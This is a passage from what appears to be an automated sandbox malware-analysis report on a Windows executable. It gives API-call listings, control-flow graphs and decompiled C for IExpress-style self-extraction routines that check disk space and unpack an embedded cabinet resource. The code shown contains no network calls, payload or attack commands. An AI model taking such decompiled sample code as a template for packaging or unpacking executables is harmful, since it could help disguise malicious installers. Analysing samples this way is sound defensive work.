                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 003257CD
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 003257EF
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00325802
                                                                                                                                                                                                                                              • Part of subcall function 00322630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00322654
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00325830
                                                                                                                                                                                                                                              • Part of subcall function 00326517: FindResourceA.KERNEL32(00320000,000007D6,00000005), ref: 0032652A
                                                                                                                                                                                                                                              • Part of subcall function 00326517: LoadResource.KERNEL32(00320000,00000000,?,?,00322EE8,00000000,003219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00326538
                                                                                                                                                                                                                                              • Part of subcall function 00326517: DialogBoxIndirectParamA.USER32(00320000,00000000,00000547,003219E0,00000000), ref: 00326557
                                                                                                                                                                                                                                              • Part of subcall function 00326517: FreeResource.KERNEL32(00000000,?,?,00322EE8,00000000,003219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00326560
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00325878
                                                                                                                                                                                                                                              • Part of subcall function 0032597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003259A8
                                                                                                                                                                                                                                              • Part of subcall function 0032597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 003259AF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                            • API String ID: 2436801531-337015389
                                                                                                                                                                                                                                            • Opcode ID: 47b785938c7cfb67ce0ab71d4db010c3bd5649dcad6790ec47c71d4713e6bc8c
                                                                                                                                                                                                                                            • Instruction ID: b3fb05eb4952f7687973059cafd562f76127d31c84fb024f7e39cdf10f017821
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47b785938c7cfb67ce0ab71d4db010c3bd5649dcad6790ec47c71d4713e6bc8c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0812971B04A349BDB33AB35BC85FEA726D9F65300F050069F986D6191EFB48FC28A50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 324 32597d-3259b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 3259bb-3259d8 call 3244b9 call 326285 324->325 326 3259dd-325a1b GetDiskFreeSpaceA 324->326 341 325c05-325c14 call 326ce0 325->341 327 325ba1-325bde memset call 326285 GetLastError FormatMessageA 326->327 328 325a21-325a4a MulDiv 326->328 338 325be3-325bfc call 3244b9 SetCurrentDirectoryA 327->338 328->327 331 325a50-325a6c GetVolumeInformationA 328->331 335 325ab5-325aca SetCurrentDirectoryA 331->335 336 325a6e-325ab0 memset call 326285 GetLastError FormatMessageA 331->336 340 325acc-325ad1 335->340 336->338 351 325c02 338->351 344 325ae2-325ae4 340->344 345 325ad3-325ad8 340->345 349 325ae6 344->349 350 325ae7-325af8 344->350 345->344 347 325ada-325ae0 345->347 347->340 347->344 349->350 353 325af9-325afb 350->353 356 325c04 351->356 354 325b05-325b08 353->354 355 325afd-325b03 353->355 357 325b20-325b27 354->357 358 325b0a-325b1b call 3244b9 354->358 355->353 355->354 356->341 360 325b52-325b5b 357->360 361 325b29-325b33 357->361 358->351 364 325b62-325b6d 360->364 361->360 363 325b35-325b50 361->363 363->364 365 325b76-325b7d 364->365 366 325b6f-325b74 364->366 368 325b83 365->368 369 325b7f-325b81 365->369 367 325b85 366->367 370 325b96-325b9f 367->370 371 325b87-325b94 call 32268b 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                            			E0032597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                            				long _v792;
                                                                                                                                                                                                                                            				long _v796;
                                                                                                                                                                                                                                            				long _v800;
                                                                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                                                                            				long _v808;
                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                            				long _v816;
                                                                                                                                                                                                                                            				long _v820;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                            				signed short _t78;
                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				int _t102;
                                                                                                                                                                                                                                            				unsigned int _t103;
                                                                                                                                                                                                                                            				unsigned int _t105;
                                                                                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                                                                                            				long _t112;
                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t114 = __edi;
                                                                                                                                                                                                                                            				_t46 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                            				_v804 = __edx;
                                                                                                                                                                                                                                            				_t118 = __ecx;
                                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                            				if(_t50 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					_v796 = 0;
                                                                                                                                                                                                                                            					_v792 = 0;
                                                                                                                                                                                                                                            					_v800 = 0;
                                                                                                                                                                                                                                            					_v808 = 0;
                                                                                                                                                                                                                                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                                                                                            					if(_t55 == 0) {
                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                            						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            						 *0x329124 = E00326285();
                                                                                                                                                                                                                                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            						_t110 = 0x4b0;
                                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						E003244B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                            						L31:
                                                                                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                            						_pop(_t114);
                                                                                                                                                                                                                                            						goto L33;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                            					_v812 = _t69;
                                                                                                                                                                                                                                            					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                            					__eflags = _t116;
                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                            						goto L29;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                                                                                            					if(_t73 != 0) {
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                            						_t101 =  &_v16;
                                                                                                                                                                                                                                            						_t111 = 6;
                                                                                                                                                                                                                                            						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                            							__eflags = _t22;
                                                                                                                                                                                                                                            							if(_t22 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                            							__eflags = _t87;
                                                                                                                                                                                                                                            							if(_t87 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *_t101 = _t87;
                                                                                                                                                                                                                                            							_t101 = _t101 + 1;
                                                                                                                                                                                                                                            							_t111 = _t111 - 1;
                                                                                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                                                                                            							if(_t111 != 0) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t111;
                                                                                                                                                                                                                                            						if(_t111 == 0) {
                                                                                                                                                                                                                                            							_t101 = _t101 - 1;
                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t101 = 0;
                                                                                                                                                                                                                                            						_t112 = 0x200;
                                                                                                                                                                                                                                            						_t102 = _v812;
                                                                                                                                                                                                                                            						_t78 = 0;
                                                                                                                                                                                                                                            						_t118 = 8;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                            							if(_t102 == _t112) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                            							_t78 = _t78 + 1;
                                                                                                                                                                                                                                            							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            							if(_t78 < _t118) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            						if(_t78 != _t118) {
                                                                                                                                                                                                                                            							__eflags =  *0x329a34 & 0x00000008;
                                                                                                                                                                                                                                            							if(( *0x329a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                            								_t103 =  *0x329a38; // 0x0
                                                                                                                                                                                                                                            								_t110 =  *((intOrPtr*)(0x3289e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                            								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                            								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                            									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                            									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									 *0x329124 = 0;
                                                                                                                                                                                                                                            									_t66 = 1;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t66 = E0032268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                            							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t105 =  *0x329a38; // 0x0
                                                                                                                                                                                                                                            							_t110 =  *((intOrPtr*)(0x3289e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x3289e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            							_t103 = (_t105 >> 2) +  *0x329a38;
                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t110 = 0x4c5;
                                                                                                                                                                                                                                            						E003244B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						goto L31;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            					 *0x329124 = E00326285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            					_t110 = 0x4f9;
                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t110 = 0x4bc;
                                                                                                                                                                                                                                            					E003244B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0x329124 = E00326285();
                                                                                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                                            					return E00326CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x0032597d
                                                                                                                                                                                                                                            0x00325988
                                                                                                                                                                                                                                            0x0032598f
                                                                                                                                                                                                                                            0x0032599a
                                                                                                                                                                                                                                            0x003259a6
                                                                                                                                                                                                                                            0x003259a8
                                                                                                                                                                                                                                            0x003259af
                                                                                                                                                                                                                                            0x003259b9
                                                                                                                                                                                                                                            0x003259dd
                                                                                                                                                                                                                                            0x003259e4
                                                                                                                                                                                                                                            0x003259f1
                                                                                                                                                                                                                                            0x003259fe
                                                                                                                                                                                                                                            0x00325a0b
                                                                                                                                                                                                                                            0x00325a13
                                                                                                                                                                                                                                            0x00325a19
                                                                                                                                                                                                                                            0x00325a1b
                                                                                                                                                                                                                                            0x00325ba1
                                                                                                                                                                                                                                            0x00325baf
                                                                                                                                                                                                                                            0x00325bbd
                                                                                                                                                                                                                                            0x00325bd8
                                                                                                                                                                                                                                            0x00325bde
                                                                                                                                                                                                                                            0x00325be3
                                                                                                                                                                                                                                            0x00325bec
                                                                                                                                                                                                                                            0x00325bf0
                                                                                                                                                                                                                                            0x00325bfc
                                                                                                                                                                                                                                            0x00325c02
                                                                                                                                                                                                                                            0x00325c02
                                                                                                                                                                                                                                            0x00325c02
                                                                                                                                                                                                                                            0x00325c04
                                                                                                                                                                                                                                            0x00325c04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325c04
                                                                                                                                                                                                                                            0x00325a27
                                                                                                                                                                                                                                            0x00325a3a
                                                                                                                                                                                                                                            0x00325a46
                                                                                                                                                                                                                                            0x00325a48
                                                                                                                                                                                                                                            0x00325a4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325a64
                                                                                                                                                                                                                                            0x00325a6a
                                                                                                                                                                                                                                            0x00325a6c
                                                                                                                                                                                                                                            0x00325abc
                                                                                                                                                                                                                                            0x00325ac2
                                                                                                                                                                                                                                            0x00325ac9
                                                                                                                                                                                                                                            0x00325aca
                                                                                                                                                                                                                                            0x00325aca
                                                                                                                                                                                                                                            0x00325acc
                                                                                                                                                                                                                                            0x00325acc
                                                                                                                                                                                                                                            0x00325acf
                                                                                                                                                                                                                                            0x00325ad1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325ad3
                                                                                                                                                                                                                                            0x00325ad6
                                                                                                                                                                                                                                            0x00325ad8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325ada
                                                                                                                                                                                                                                            0x00325adc
                                                                                                                                                                                                                                            0x00325add
                                                                                                                                                                                                                                            0x00325add
                                                                                                                                                                                                                                            0x00325ae0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325ae0
                                                                                                                                                                                                                                            0x00325ae2
                                                                                                                                                                                                                                            0x00325ae4
                                                                                                                                                                                                                                            0x00325ae6
                                                                                                                                                                                                                                            0x00325ae6
                                                                                                                                                                                                                                            0x00325ae6
                                                                                                                                                                                                                                            0x00325ae9
                                                                                                                                                                                                                                            0x00325aeb
                                                                                                                                                                                                                                            0x00325af0
                                                                                                                                                                                                                                            0x00325af6
                                                                                                                                                                                                                                            0x00325af8
                                                                                                                                                                                                                                            0x00325af9
                                                                                                                                                                                                                                            0x00325af9
                                                                                                                                                                                                                                            0x00325afb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325afd
                                                                                                                                                                                                                                            0x00325aff
                                                                                                                                                                                                                                            0x00325b00
                                                                                                                                                                                                                                            0x00325b03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325b03
                                                                                                                                                                                                                                            0x00325b05
                                                                                                                                                                                                                                            0x00325b08
                                                                                                                                                                                                                                            0x00325b20
                                                                                                                                                                                                                                            0x00325b27
                                                                                                                                                                                                                                            0x00325b52
                                                                                                                                                                                                                                            0x00325b52
                                                                                                                                                                                                                                            0x00325b5b
                                                                                                                                                                                                                                            0x00325b62
                                                                                                                                                                                                                                            0x00325b6b
                                                                                                                                                                                                                                            0x00325b6d
                                                                                                                                                                                                                                            0x00325b76
                                                                                                                                                                                                                                            0x00325b7d
                                                                                                                                                                                                                                            0x00325b83
                                                                                                                                                                                                                                            0x00325b7f
                                                                                                                                                                                                                                            0x00325b7f
                                                                                                                                                                                                                                            0x00325b7f
                                                                                                                                                                                                                                            0x00325b6f
                                                                                                                                                                                                                                            0x00325b72
                                                                                                                                                                                                                                            0x00325b72
                                                                                                                                                                                                                                            0x00325b85
                                                                                                                                                                                                                                            0x00325b98
                                                                                                                                                                                                                                            0x00325b9e
                                                                                                                                                                                                                                            0x00325b87
                                                                                                                                                                                                                                            0x00325b8f
                                                                                                                                                                                                                                            0x00325b8f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325b85
                                                                                                                                                                                                                                            0x00325b29
                                                                                                                                                                                                                                            0x00325b33
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325b35
                                                                                                                                                                                                                                            0x00325b48
                                                                                                                                                                                                                                            0x00325b4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325b4a
                                                                                                                                                                                                                                            0x00325b0f
                                                                                                                                                                                                                                            0x00325b16
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325b16
                                                                                                                                                                                                                                            0x00325a7c
                                                                                                                                                                                                                                            0x00325a8a
                                                                                                                                                                                                                                            0x00325aa5
                                                                                                                                                                                                                                            0x00325aab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003259bb
                                                                                                                                                                                                                                            0x003259c0
                                                                                                                                                                                                                                            0x003259c7
                                                                                                                                                                                                                                            0x003259d1
                                                                                                                                                                                                                                            0x003259d6
                                                                                                                                                                                                                                            0x00325c05
                                                                                                                                                                                                                                            0x00325c14
                                                                                                                                                                                                                                            0x00325c14

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003259A8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 003259AF
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00325A13
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00325A40
                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00325A64
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00325A7C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00325A98
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00325AA5
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00325BFC
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                              • Part of subcall function 00326285: GetLastError.KERNEL32(00325BBC), ref: 00326285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                            • Opcode ID: daf1e2feee90dc7d821800dd3d4bf6495acc3397b252f7e445f0b34cb65a270e
                                                                                                                                                                                                                                            • Instruction ID: 16d73d2bad1105e17f44e66aad2f3b56552c2a303a90178504ad4d446e527d77
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: daf1e2feee90dc7d821800dd3d4bf6495acc3397b252f7e445f0b34cb65a270e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E7191B190062CAFEB279F64EC85FFA77ADEB48340F0440AAF405D6140EA309F858B64
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 374 324fe0-32501a call 32468f FindResourceA LoadResource LockResource 377 325020-325027 374->377 378 325161-325163 374->378 379 325057-32505e call 324efd 377->379 380 325029-325051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 325060-325077 call 3244b9 379->383 384 32507c-3250b4 379->384 380->379 388 325107-32510e 383->388 389 3250b6-3250da 384->389 390 3250e8-325104 call 3244b9 384->390 392 325110-325117 FreeResource 388->392 393 32511d-32511f 388->393 398 325106 389->398 399 3250dc 389->399 390->398 392->393 395 325121-325127 393->395 396 32513a-325141 393->396 395->396 400 325129-325135 call 3244b9 395->400 401 325143-32514a 396->401 402 32515f 396->402 398->388 405 3250e3-3250e6 399->405 400->396 401->402 404 32514c-325159 SendMessageA 401->404 402->378 404->402 405->390 405->398
                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00324FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t36 = "CABINET";
                                                                                                                                                                                                                                            				 *0x329144 = E0032468F(_t36, 0, 0);
                                                                                                                                                                                                                                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                            				 *0x329140 = _t8;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t9 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            				if(_t9 != 0) {
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem( *0x328584, 0x841), 5); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t10 = E00324EFD(0, 0); // executed
                                                                                                                                                                                                                                            				if(_t10 != 0) {
                                                                                                                                                                                                                                            					__imp__#20(E00324CA0, E00324CC0, E00324980, E00324A50, E00324AD0, E00324B60, E00324BC0, 1, 0x329148, _t33);
                                                                                                                                                                                                                                            					_t34 = _t10;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						_t29 =  *0x329148; // 0x0
                                                                                                                                                                                                                                            						_t24 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            						E003244B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#22(_t34, "*MEMCAB", 0x321140, 0, E00324CD0, 0, 0x329140); // executed
                                                                                                                                                                                                                                            					_t37 = _t10;
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            					E003244B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_t12 =  *0x329140; // 0x0
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						FreeResource(_t12);
                                                                                                                                                                                                                                            						 *0x329140 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						_t47 =  *0x3291d8; // 0x0
                                                                                                                                                                                                                                            						if(_t47 == 0) {
                                                                                                                                                                                                                                            							E003244B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(( *0x328a38 & 0x00000001) == 0 && ( *0x329a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            						SendMessageA( *0x328584, 0xfa1, _t37, 0);
